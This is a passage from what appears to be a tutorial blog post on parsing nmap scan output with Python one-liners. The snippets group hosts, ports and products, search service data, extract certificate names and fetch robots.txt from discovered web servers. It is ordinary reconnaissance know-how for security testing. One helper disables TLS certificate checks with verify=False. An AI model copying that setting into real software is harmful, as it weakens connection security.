b.servicefp) and b.port in [c[0] for c in a.get_open_ports()] ]Software products identified by nmapShow a unique list of the products that nmap identified during the scan. Generates a sorted list of strings for each product.sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner]))Host and port combinations serving software products, grouped by productShow each software product, with hosts and ports where they are served, grouped by product. Generates a list of lists, where each child has a first element of the product name as a string, followed by a list of lists, where each child list contains the address as a string, and the port number as an int.[ [ a, [ [b.address, c.port] for b in nmap_report.hosts for c in b.services if c.banner==a] ] for a in sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner])) ]Same as the above, shows each product, with hosts and ports where they are enabled, grouped by product, but with a slightly different presentation. This generates a list of lists, the first element in each list is the product name as a string, the second element is a list of host:ports as strings.[ [ a, [ ':'.join([b.address, str(c.port)]) for b in nmap_report.hosts for c in b.services if c.banner==a] ] for a in sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner])) ]Host and port combinations serving services relating to a particular search stringShow all the hosts and ports that relate to a given (case sensitive) search string, which can be found anywhere in a raw text dump of all the service information provided by nmap, covering the product name, the service name, etc. The string "Oracle" is used in the example below. Can be used to create a more generalised, or alternatively more specific grouping of services than the snippet above. Generates a list of lists, where each child list contains the address of a host as a string and the port as an int.[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and 'Oracle' in str(b.get_dict()) + str(b.scripts_results) ]Shows the same as the above, all host and port combinations that match a given search string, but in this case its modified to match against a service information dump that's all in lower case. Use lower case search strings here (the example is a lower case "oracle"). Generates output in the same format as the example above.[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and 'oracle' in (str(b.get_dict()) + str(b.scripts_results)).lower() ]Random StuffCommon Name from Certificate SubjectShows the common name field from any SSL certificates found and parsed by nmap during a script scan. Can be useful to determine the systems host name if you only started with an IP Address and reverse DNS doesnt work. Generates a list of lists, each containing the IP address and extracted host name as strings.[ [a.address, c['elements']['subject']['commonName'] ] for a in nmap_report.hosts for b in a.services for c in b.scripts_results if c.has_key('elements') and c['elements'].has_key('subject') ]Ways to use the resultsAs mentioned earlier, the examples above, when pasted into your IPython REPL, will just dump the output to screen, where you can look at it. That's nice, cause it allows you to see the data you're interested in, ensure it passes the "smell" test, etc, but you probably want to do other stuff with it as well. One of the benefits of generating the information above in this way is that you can easily perform some further automated action with the result. If you're already familiar with Python, it will be pretty easy for you to perform these other types of tasks, and you can skip this section, but for those who are not, this section will provide some basic pointers on how you can make use of these snippets. The examples below will demonstrate some simple examples of the things that you might want to do with them.Saving to diskIf you want to write the output of one of the snippets to disk to a text file, you need to join the list together in an appropriate string format (depending on your use case) and then actually write it out to a file. In Python, we can join the list to a string using the join function, and write it to disk using open and write. Here's an example.Lets say we want to take our generated list of hosts and ports that support ssl, and pass them out to a newline separated file so we can do a for loop in bash and test each combination for secure ssl usage using a command line tool (are the ciphers correct, are there bad protocols like ssl3 or 3, etc). I would do all of this in a giant one liner in IPython, because that's the sort of thing that amuses me, but I will break it down into individual lines of code here for readability in this example.Our list comprehension, that generates a list of host:port strings from above, is as follows. Note how we use the str function around the port number to convert it to a string from an int to allow it to be joined together with other strings. This is something to be aware of when manipulating this sort of data like this, and was something that caught me out a lot when I was first learning to use Python. [ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]Lets assign it to a variable named "ssl_services" to make it easier to work with.ssl_services = [ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ] Now, lets join each list element together with newlines ('\n'), using Pythons join function, and assign it to a new variable, "ssl_services_text".ssl_services_text = '\n'.join(ssl_services)Now, we can create a new file "ssl_services_file.txt" in the present working directory, and write the contents of our ssl_services_text variable to it.open('ssl_services_file.txt','w').write(ssl_services_text)Easy. Now you can bash away at the file to your hearts content.Using with other Python codePerhaps you want to use the list comprehensions above in other Python code? That's easy too. Here's a simple example, where we will loop through each of our websites identified from nmap, and see the result of requesting a particular page from that site.Here's the list comprehension that generates the list of URLs. We will assign it directly to a variable called "urls".urls = [ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]Next, we do some prep work, and import the requests module and setup a simple helper function that makes a web request and saves the result to file on disk with an autogenerated name based on the url. You will note below that the get request uses the "verify=False" option, which ignores certificate validation errors when making the request, something that's often necessary when testing internally on machines that may not trust the certificate authorities used to sign SSL certificates.import requestsdef getAndSave(url): r = requests.get(url, verify=False) open('_'.join(url.split('/')[2:]).replace(':',''),'wb').write(r.text.encode('utf8'))Now, we will add some code to iterate through each of the base URLs from nmap, and requests the robots.txt file for each site so that it can be saved to disk for our later perusal.for a in urls: getAndSave(a + 'robots.txt')This will request each the robots.txt from each of the sites in turn, and save it to disk in the current working directory. This is just a very simple example (there's not even any error checking in the getAndSave function, but it hopefully gives you an idea of whats possible.ConclusionHope you found this useful, and that it gave you an appreciation of how useful and flexible Python can be when parsing nmap scan data.Are there any other common tasks you perform with nmap scan data that you would like a one-liner for? Leave a comment!